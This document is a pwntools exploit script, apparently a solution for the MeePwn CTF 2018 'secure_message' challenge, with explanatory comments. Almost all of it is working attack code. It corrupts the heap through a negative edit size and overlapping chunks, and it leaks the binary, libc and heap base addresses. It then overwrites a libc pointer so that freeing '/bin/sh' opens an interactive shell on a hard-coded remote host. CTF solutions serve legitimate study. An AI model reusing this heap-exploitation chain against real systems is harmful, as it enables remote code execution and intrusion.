MeePwn CTF 2018 Quals secure_message
#!/usr/bin/env python
from pwn import *
# gdb windows open in a horizontal tmux split when debugging (options 'd'/'a')
context.terminal = ['tmux', 'splitw', '-h']  # horizontal split window
# context.terminal = ['tmux', 'new-window']  # open new window
# libc = ELF('./libc-2.27.so')
# The target binary; its architecture configures the packing helpers (p64/u64).
elf = ELF('./secure_message')
context.os = 'linux'
context.arch = elf.arch
# Remote challenge endpoint ('r') and local listener ('l'); selected by the
# command-line option handled further down.
RHOST = "178.128.87.12"
RPORT = 31337
LHOST = "127.0.0.1"
LPORT = 31337
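def section_addr(name, elf=elf):
    """Return the load address (``sh_addr``) of ELF section ``name``.

    Args:
        name: section name, e.g. ``'.bss'``.
        elf: parsed binary to look in; defaults to the module-level ``elf``.

    Returns:
        The section's ``sh_addr`` header field as an int.

    Raises:
        KeyError: if the binary has no section with that name. Without this
            check a missing section surfaces as an opaque AttributeError on
            ``None``.
    """
    section = elf.get_section_by_name(name)
    if section is None:
        raise KeyError('no section named %r' % (name,))
    return section.header['sh_addr']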
def dbg(ss):
    """Log ``ss`` and its value in hex, e.g. ``bin_base: 0x555555554000``.

    ``ss`` is evaluated with ``eval`` in this module's scope. It is only ever
    a literal variable name written in this script (see the calls below); it
    must never be fed anything that did not originate in the source file.
    """
    value = eval(ss)  # developer-supplied name only, never external data
    log.info("%s: 0x%x" % (ss, value))
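conn = None
# One optional CLI argument selects how the target is reached. It is popped
# so pwntools' own argument parsing does not see it.
#   r  connect to RHOST:RPORT        l  connect to LHOST:LPORT
#   d  launch under gdb.debug()      a  launch locally, then gdb.attach()
#   anything else / none: launch locally
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
if opt in ('r', 'l'):
    # Tuple membership rather than a substring test (`opt in 'rl'`): the
    # substring form also accepted '' and 'rl' and then raised KeyError on
    # the lookup below.
    targets = {'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}
    conn = remote(*targets[opt])
elif opt == 'd':
    # The script has no placeholders, so the former .format(...) call on it
    # was a no-op and has been dropped.
    gdbscript = """
continue
"""
    conn = gdb.debug(['./secure_message'], gdbscript=gdbscript)
else:
    conn = process(['./secure_message'])
    # conn = process(['./secure_message'], env={'LD_PRELOAD': './libc-2.27.so'})
    if opt == 'a':
        gdb.attach(conn)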
def register(name, password, desc):
    """Drive menu option 1 (register): answer the three prompts in order.

    All three values are sent raw with ``sendafter`` (no newline appended),
    so the caller supplies any terminator the program expects.
    """
    replies = (
        ('Username:', name),
        ('Password:', password),
        ('Describe your self', desc),
    )
    conn.sendlineafter('Choice: ', '1')
    for prompt, answer in replies:
        conn.sendafter(prompt, answer)
def login(name, password):
    """Drive menu option 2 (login) and consume output up to the greeting.

    ``name`` and ``password`` are sent raw (no newline appended); the caller
    is responsible for any terminator.
    """
    conn.sendlineafter('Choice: ', '2')
    for prompt, answer in (('Username:', name), ('Password:', password)):
        conn.sendafter(prompt, answer)
    # Discard everything up to the post-login banner so later prompt
    # matching starts from a known position in the stream.
    conn.recvuntil('Hello:')
def quit():
    """Select menu option 3.

    Note: this shadows the ``quit`` builtin for the rest of the script.
    """
    choice = '3'
    conn.sendlineafter('Choice: ', choice)
def add(name, size, content):
    """Logged-in menu option 1: create an entry.

    ``size`` is sent as its decimal string without validation here. The
    0.1 s pause gives the program time to consume the size line before the
    raw ``content`` (sent without a trailing newline) arrives.
    """
    replies = (
        ('Choice: ', '1'),
        ('Name: ', name),
        ('Size:', str(size)),
    )
    for prompt, answer in replies:
        conn.sendlineafter(prompt, answer)
    time.sleep(0.1)
    conn.send(content)
def edit(idx, size, content):
    """Logged-in menu option 3: rewrite entry ``idx``.

    ``idx`` and ``size`` are sent as their decimal strings without
    validation here. The 0.1 s pause lets the program consume the size line
    before the raw ``content`` (no trailing newline appended) is sent.
    """
    replies = (
        ('Choice: ', '3'),
        ('edit?', str(idx)),
        ('Size:', str(size)),
    )
    for prompt, answer in replies:
        conn.sendlineafter(prompt, answer)
    time.sleep(0.1)
    conn.send(content)
def remove(idx):
    """Logged-in menu option 2: delete entry ``idx`` (sent as a decimal string)."""
    index_text = str(idx)
    conn.sendlineafter('Choice: ', '2')
    conn.sendlineafter('?', index_text)
# exploit
# Scripted end-to-end interaction for the challenge. Written for Python 2:
# `str` is the byte type, so `+ '\x00\x00'` pads raw bytes and
# `.decode('hex')` turns hex text into bytes (neither works unchanged on
# Python 3). The constants combined with the values read back below (0x211d,
# 0x3ec2b0, 0x250, 0x3ed8e8, 0x4f440) are tied to the exact binary and libc
# build the author used -- see the commented-out libc-2.27.so line near the
# top -- TODO confirm they match the build actually being run.
log.info('Pwning')
# Create four accounts, then log in as the first. register() sends its
# arguments raw, so the '\n' on the first account's fields is part of the
# value and matches the login() call below.
register('hoge\n', 'fuga\n','a'*0x80)
register('b'*0x20,'b'*0x20,'b'*0x80)
register('c'*0x20,'c'*0x20,'c'*0x80)
register('d'*0x20,'d'*0x20,'d'*0x80)
login('hoge\n', 'fuga\n')
# add() only answers the menu prompts; the raw conn.send() calls that follow
# each add() are additional bytes the helper does not cover.
add('x'*0x18, 0xfd0, 'z'*0xfd0)
conn.send(p64(0xc9f68e5b26a07627))
conn.send(p64(0xc9f68e5b26a07627))
conn.send(p64(0xc9f68e5b26a07627))
add('y'*0x18, 0xfd0, 'w'*0xfd0)
conn.send(p64(0xc9f68e5b26a07627+0x1000))
conn.send(p64(0xc9f68e5b26a07627+0x1000))
conn.send(p64(0xc9f68e5b26a07627+0x1000))
# edit() passes size straight through str(), so the program receives "-1".
edit(0, -1, 'a'*0x1f00+'\n')
add('', 0xff, '\n')
conn.send(p64(0xc9f68e5b26a07627+0x3000))
conn.send(p64(0xc9f68e5b26a07627+0x3000))
conn.send(p64(0)*4)
#conn.send(p64(0xc9f68e5b26a07627+0x2000))
# Menu option 4 appears to print the stored entries; the output following
# the 'yyy...' entry is read back and parsed into three base addresses.
conn.sendlineafter('Choice: ', '4')
conn.recvuntil('1 - [yyyyyyyyyyyyyyyyyyyyyyyy')
bin_base = u64(conn.recv(6)+'\x00\x00') - 0x211d  # 6 raw bytes, zero-padded to 8
dbg('bin_base')
conn.recvuntil('\n')
libc_base = u64(conn.recv(14).decode('hex')+'\x00') - 0x3ec2b0  # 14 hex chars -> 7 bytes + 1 pad byte
dbg('libc_base')
conn.recv(14)  # skipped field
heap_base = u64(conn.recv(14).decode('hex')+'\x00') - 0x250
dbg('heap_base')
add('aaaaaa', 0x1000, 'b'*0x1000)
conn.send(p64(0xdeadbeef000))
conn.send(p64(0xdeadbeef000))
conn.send(p64(0)*4)
add('target', 0x100, 'c'*0x1000)
conn.send(p64(0xdeadbef0000))
conn.send(p64(0xdeadbef0000))
conn.send(p64(0)*4)
edit(2, 8192, 'hoge\n')
payload = 'd'*0xfd0 + p32(0x100) + p32(1) + p64(0xe5b26a08030 + 0x10)
add('aaaaaa', 0x1100, payload+'\n')
conn.send(p64(0x00000deadbef0000-0x1000))
conn.send(p64(0x00000deadbef0000-0x1000))
conn.send(p64(0)*4)
payload = p64(0) + p64(0x31)
payload += p64(0) * 5
payload += p64(0x31)
edit(0, 0x100, payload+'\n')
remove(2)
payload = p64(0) + p64(0x31)
# 0x3ed8e8 is a build-specific libc offset (see note at the top of this section)
payload += p64(libc_base + 0x3ed8e8)+p64(0) * 4
payload += p64(0x31)
edit(0, 0x100, payload+'\n')
add('a', 0xf00, 'hoge\n')
conn.send(p64(0xbeefdead000))
conn.send(p64(0xbeefdead000))
conn.send(p64(0)*4)
add('a', 0xf00, '/bin/sh\x00\n')
conn.send(p64(0xbeefdead000))
conn.send(p64(0xbeefdead000))
conn.send(p64(libc_base+0x4f440))  # build-specific libc offset
# Hand the connection over to the terminal.
conn.interactive()